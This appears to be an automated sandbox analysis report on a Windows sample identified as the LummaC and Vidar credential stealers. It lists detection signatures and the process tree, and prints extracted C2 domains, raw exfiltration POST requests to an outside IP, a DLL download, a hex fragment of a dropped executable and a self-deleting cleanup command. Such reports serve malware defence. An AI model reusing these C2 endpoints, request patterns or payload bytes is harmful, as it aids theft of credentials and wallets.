Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1515122
MD5:	4ae2d1685d2732cfcd128560424c53cc
SHA1:	cfc1bb605838dae6c9f8cd73dd70df914c15c6d4
SHA256:	c13ea8341a801122bce40ae4d3d608728bf9c88404f3c315db88bd55c7316669
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4AE2D1685D2732CFCD128560424C53CC)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BKKKEGIDBG.exe (PID: 8188 cmdline: "C:\ProgramData\BKKKEGIDBG.exe" MD5: F5A1956973DCE107D4C0B6267CE88870)

conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1776 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1788 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cmd.exe (PID: 6044 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAEHCFCBKKJD" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3368 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["surveriysiop.shop", "captainynfanw.shop", "coursedonnyre.shop", "appleboltelwk.shop", "tearrybyiwo.shop", "fossillargeiw.shop", "tendencerangej.shop", "strappystyio.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "58cd250b15e666e5f72fcf5caa6cb131"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7520	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7520	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.35b5570.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.35b5570.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.35b5570.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.35b5570.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:51:29.128437+0200	2028765	3	Unknown Traffic	192.168.2.4	49740	116.203.165.127	443	TCP
2024-09-21T18:51:30.442551+0200	2028765	3	Unknown Traffic	192.168.2.4	49741	116.203.165.127	443	TCP
2024-09-21T18:51:32.283449+0200	2028765	3	Unknown Traffic	192.168.2.4	49742	116.203.165.127	443	TCP
2024-09-21T18:51:33.986937+0200	2028765	3	Unknown Traffic	192.168.2.4	49743	116.203.165.127	443	TCP
2024-09-21T18:51:35.428880+0200	2028765	3	Unknown Traffic	192.168.2.4	49744	116.203.165.127	443	TCP
2024-09-21T18:51:36.838083+0200	2028765	3	Unknown Traffic	192.168.2.4	49745	116.203.165.127	443	TCP
2024-09-21T18:51:37.837266+0200	2028765	3	Unknown Traffic	192.168.2.4	49746	116.203.165.127	443	TCP
2024-09-21T18:51:41.307984+0200	2028765	3	Unknown Traffic	192.168.2.4	49747	116.203.165.127	443	TCP
2024-09-21T18:51:42.314354+0200	2028765	3	Unknown Traffic	192.168.2.4	49748	116.203.165.127	443	TCP
2024-09-21T18:51:43.372650+0200	2028765	3	Unknown Traffic	192.168.2.4	49749	116.203.165.127	443	TCP
2024-09-21T18:51:44.546351+0200	2028765	3	Unknown Traffic	192.168.2.4	49750	116.203.165.127	443	TCP
2024-09-21T18:51:45.456965+0200	2028765	3	Unknown Traffic	192.168.2.4	49751	116.203.165.127	443	TCP
2024-09-21T18:51:47.427196+0200	2028765	3	Unknown Traffic	192.168.2.4	49752	116.203.165.127	443	TCP
2024-09-21T18:51:49.184473+0200	2028765	3	Unknown Traffic	192.168.2.4	49753	116.203.165.127	443	TCP
2024-09-21T18:51:50.746428+0200	2028765	3	Unknown Traffic	192.168.2.4	49754	116.203.165.127	443	TCP
2024-09-21T18:51:52.318966+0200	2028765	3	Unknown Traffic	192.168.2.4	49755	116.203.165.127	443	TCP
2024-09-21T18:51:53.661994+0200	2028765	3	Unknown Traffic	192.168.2.4	49756	116.203.165.127	443	TCP
2024-09-21T18:51:57.014191+0200	2028765	3	Unknown Traffic	192.168.2.4	49757	116.203.165.127	443	TCP
2024-09-21T18:51:57.902338+0200	2028765	3	Unknown Traffic	192.168.2.4	49758	116.203.165.127	443	TCP
2024-09-21T18:51:59.401701+0200	2028765	3	Unknown Traffic	192.168.2.4	49759	116.203.165.127	443	TCP
2024-09-21T18:52:00.881617+0200	2028765	3	Unknown Traffic	192.168.2.4	49761	116.203.165.127	443	TCP
2024-09-21T18:52:03.763591+0200	2028765	3	Unknown Traffic	192.168.2.4	49762	116.203.165.127	443	TCP
2024-09-21T18:52:06.072019+0200	2028765	3	Unknown Traffic	192.168.2.4	49763	116.203.165.127	443	TCP
2024-09-21T18:52:10.052319+0200	2028765	3	Unknown Traffic	192.168.2.4	49765	116.203.165.127	443	TCP
2024-09-21T18:52:11.967550+0200	2028765	3	Unknown Traffic	192.168.2.4	49767	116.203.165.127	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:52:11.337181+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49766	104.21.9.6	443	TCP
2024-09-21T18:52:12.404016+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49768	188.114.96.3	443	TCP
2024-09-21T18:52:13.445416+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49769	188.114.96.3	443	TCP
2024-09-21T18:52:14.454366+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49772	172.67.203.61	443	TCP
2024-09-21T18:52:15.362840+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49773	104.21.9.6	443	TCP
2024-09-21T18:52:15.990378+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49774	104.21.16.38	443	TCP
2024-09-21T18:52:17.165885+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49775	104.21.16.38	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:52:11.337181+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49766	104.21.9.6	443	TCP
2024-09-21T18:52:12.404016+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49768	188.114.96.3	443	TCP
2024-09-21T18:52:13.445416+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49769	188.114.96.3	443	TCP
2024-09-21T18:52:14.454366+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49772	172.67.203.61	443	TCP
2024-09-21T18:52:15.362840+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49773	104.21.9.6	443	TCP
2024-09-21T18:52:15.990378+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49774	104.21.16.38	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:52:17.165885+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49775	104.21.16.38	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:52:13.445284+0200	2054495	1	A Network Trojan was detected	192.168.2.4	49770	45.132.206.251	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:51:34.675371+0200	2044247	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:51:36.121893+0200	2051831	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.4	49744	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:51:36.121409+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49744	116.203.165.127	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T18:52:07.460539+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49764	147.45.44.104	80	TCP

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 16:52:07 GMTContent-Type: application/octet-streamContent-Length: 390560Last-Modified: Sat, 21 Sep 2024 16:14:02 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66eef0ca-5f5a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 d0 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 5e bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 bb 05 00 53 00 00 00 00 c0 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 78 cf 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 d0 b9 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 9b 05 00 00 20 00 00 00 9c 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 c0 05 00 00 06 00 00 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 bb 05 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 aa 05 00 e8 0e 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 06 fe 5e 4e d1 6d 09 54 6c 83 43 de 9f 7a 4f 33 26 31 56 af 48 83 a7 5f e1 ea 9f 02 26 e6 e6 18 af 60 7b ac 35 9f cd a8 ea 28 ce 04 90 22 c9 bd f4 be 04 eb c1 d1 df a1 a1 e3 81 55 4e 69 72 5b 48 df 1a 63 18 7b e5 c4 39 f2 06 bb 69 e7 c0 33 30 f8 cc 1b 5c 3a 09 64 22 44 7d c3 5a 4a eb 33 48 b2 8b 80 d7 02 9d 16 84 fb e1 8f ab bd b0 f5 e8 b7 66 94 93 54 57 d0 76 f4 f7 69 35 d9 6d 68 a0 57 02 7a 8a c9 05 7f 21 ee c7 94 e1 fc b2 a4 e2 94 22 8b b0 74 dc 27 1e c9 1f e0 4c 6c d6 d6 db 2c 29 cb 3b c7 56 be f7 39 36 ff 65 c7 46 e1 61 82 d3 95 e3 8d 2f 14 54 16 e8 d5 e7 0a 78 1a 94 cc 35 91 2a e9 e8 af e3 64 1e f4 b5 2c 55 72 d6 39 cf 38 fa 7e 61 76 1b 1b 5c 4e 36 04 fd 61 a0 24 2a 93 71 14 bc 14 ab 63 9f 1e c8 c1 ed 2d 19 f1 c2 db 81 a4 54 b0 b7 4d 5e ba b6 8d 29 4c 22 82 d4 0c 88 9a 56 7f fc bd 04 cc 71 ea d0 8a 3e a5 b2 ea cc dc 96 45 70 f8 d2 6f 3e a2 79 ca e1 05 52 d8 21 a3 1f f2 9f 1a 34 20 b3 8

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 92.122.104.90 92.122.104.90
Source: Joe Sandbox View	IP Address: 116.203.165.127 116.203.165.127
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49767 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49764 -> 147.45.44.104:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 7633Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFIJJEBKEBFCBGDAEGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
